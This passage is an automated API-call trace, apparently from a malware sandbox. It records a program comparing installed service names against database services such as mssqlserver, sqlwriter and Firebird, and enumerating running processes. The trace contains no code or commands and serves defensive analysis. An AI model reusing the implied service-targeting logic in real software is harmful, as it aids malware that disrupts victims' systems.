lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0206.419] lstrlenW (lpString="RpcSs") returned 5 [0206.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0206.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0206.419] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0206.419] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0206.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0206.419] lstrlenW (lpString="SamSs") returned 5 [0206.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0206.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0206.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0206.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0206.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0206.419] lstrlenW (lpString="Schedule") returned 8 [0206.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0206.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0206.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0206.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0206.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0206.420] lstrlenW (lpString="SecurityHealthService") returned 21 [0206.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0206.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0206.420] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0206.420] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0206.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0206.420] lstrlenW (lpString="SENS") returned 4 [0206.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0206.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0206.420] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0206.420] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0206.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0206.420] lstrlenW (lpString="ShellHWDetection") returned 16 [0206.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0206.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0206.420] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0206.420] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0206.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0206.420] lstrlenW (lpString="Spooler") returned 7 [0206.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0206.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0206.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0206.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0206.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0206.420] lstrlenW (lpString="sppsvc") returned 6 [0206.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0206.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0206.421] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0206.421] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0206.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0206.421] lstrlenW (lpString="SSDPSRV") returned 7 [0206.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0206.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0206.421] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0206.421] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0206.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3dc [0206.426] Process32FirstW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.427] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.428] lstrlenW (lpString="System") returned 6 [0206.428] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.429] lstrlenW (lpString="smss.exe") returned 8 [0206.429] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.430] lstrlenW (lpString="csrss.exe") returned 9 [0206.430] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.431] lstrlenW (lpString="wininit.exe") returned 11 [0206.431] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.432] lstrlenW (lpString="csrss.exe") returned 9 [0206.432] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.433] lstrlenW (lpString="winlogon.exe") returned 12 [0206.433] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.434] lstrlenW (lpString="services.exe") returned 12 [0206.434] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.435] lstrlenW (lpString="lsass.exe") returned 9 [0206.435] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.436] lstrlenW (lpString="svchost.exe") returned 11 [0206.436] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0206.437] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0206.437] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0206.438] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0206.438] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.439] lstrlenW (lpString="svchost.exe") returned 11 [0206.439] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.440] lstrlenW (lpString="dwm.exe") returned 7 [0206.440] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.441] lstrlenW (lpString="svchost.exe") returned 11 [0206.441] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.442] lstrlenW (lpString="svchost.exe") returned 11 [0206.442] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.443] lstrlenW (lpString="svchost.exe") returned 11 [0206.444] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.445] lstrlenW (lpString="svchost.exe") returned 11 [0206.446] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.446] lstrlenW (lpString="svchost.exe") returned 11 [0206.447] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.448] lstrlenW (lpString="svchost.exe") returned 11 [0206.448] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.449] lstrlenW (lpString="svchost.exe") returned 11 [0206.449] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.450] lstrlenW (lpString="svchost.exe") returned 11 [0206.450] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.451] lstrlenW (lpString="svchost.exe") returned 11 [0206.451] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.452] lstrlenW (lpString="spoolsv.exe") returned 11 [0206.452] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.453] lstrlenW (lpString="svchost.exe") returned 11 [0206.453] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.454] lstrlenW (lpString="svchost.exe") returned 11 [0206.454] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.460] lstrlenW (lpString="audiodg.exe") returned 11 [0206.464] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.465] lstrlenW (lpString="sihost.exe") returned 10 [0206.466] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.466] lstrlenW (lpString="svchost.exe") returned 11 [0206.467] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0206.468] lstrlenW (lpString="taskhostw.exe") returned 13 [0206.468] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0206.470] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0206.470] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0206.471] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0206.471] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.013] lstrlenW (lpString="explorer.exe") returned 12 [0207.013] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0207.026] lstrlenW (lpString="Memory Compression") returned 18 [0207.026] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0207.027] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0207.027] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0207.028] lstrlenW (lpString="SearchUI.exe") returned 12 [0207.028] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0207.029] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0207.029] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.030] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0207.030] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0207.031] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0207.031] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0207.032] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0207.032] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0207.033] lstrlenW (lpString="conhost.exe") returned 11 [0207.033] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0207.034] lstrlenW (lpString="roof competitive.exe") returned 20 [0207.034] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0207.036] lstrlenW (lpString="trustees.exe") returned 12 [0207.036] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0207.037] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0207.038] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0207.038] lstrlenW (lpString="isbn.exe") returned 8 [0207.039] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0207.359] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0207.359] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0207.360] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0207.360] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0207.361] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0207.361] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0207.362] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0207.362] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0207.363] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0207.363] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0207.364] lstrlenW (lpString="playstation iraq.exe") returned 20 [0207.364] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0207.365] lstrlenW (lpString="harbor.exe") returned 10 [0207.365] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0207.366] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0207.366] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0207.368] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0207.368] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0207.369] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0207.369] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0207.370] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0207.370] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0207.371] lstrlenW (lpString="larent.exe") returned 10 [0207.371] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0207.372] lstrlenW (lpString="stereo.exe") returned 10 [0207.372] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0207.373] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0207.373] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: 